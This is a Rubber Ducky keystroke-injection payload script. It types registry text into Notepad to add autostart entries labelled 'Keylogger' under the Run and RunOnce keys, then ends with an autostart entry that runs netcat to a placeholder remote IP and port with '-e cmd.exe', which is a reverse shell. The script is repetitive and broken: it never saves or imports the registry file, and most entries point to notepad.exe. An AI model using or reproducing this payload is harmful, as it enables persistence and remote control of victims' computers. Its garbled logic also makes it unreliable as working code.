REM Rubber Ducky Payload

DELAY 1000
GUI r
DELAY 500
STRING notepad
ENTER
DELAY 500
STRING Windows Registry Editor Version 5.00
ENTER
DELAY 500
STRING [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
ENTER
DELAY 500
STRING "Keylogger"="%windir%\system32\notepad.exe"
ENTER
DELAY 500
STRING [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
ENTER
DELAY 500
STRING "Keylogger"="%windir%\system32\notepad.exe"
ENTER
DELAY 500
STRING Windows Registry Editor Version 5.00
ENTER
DELAY 500
STRING [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
ENTER
DELAY 500
STRING "Keylogger"="%windir%\system32\notepad.exe"
ENTER
DELAY 500
STRING [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
ENTER
DELAY 500
STRING "Keylogger"="%windir%\system32\notepad.exe"
ENTER
DELAY 500
STRING Windows Registry Editor Version 5.00
ENTER
DELAY 500
STRING [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
ENTER
DELAY 500
STRING "Keylogger"="%windir%\system32\notepad.exe"
ENTER
DELAY 500
STRING [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
ENTER
DELAY 500
STRING "Keylogger"="%windir%\system32\notepad.exe"
ENTER
DELAY 500
STRING Windows Registry Editor Version 5.00
ENTER
DELAY 500
STRING [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
ENTER
DELAY 500
STRING "Keylogger"="%windir%\system32\nc.exe <REMOTE_IP> <REMOTE_PORT> -e cmd.exe"
ENTER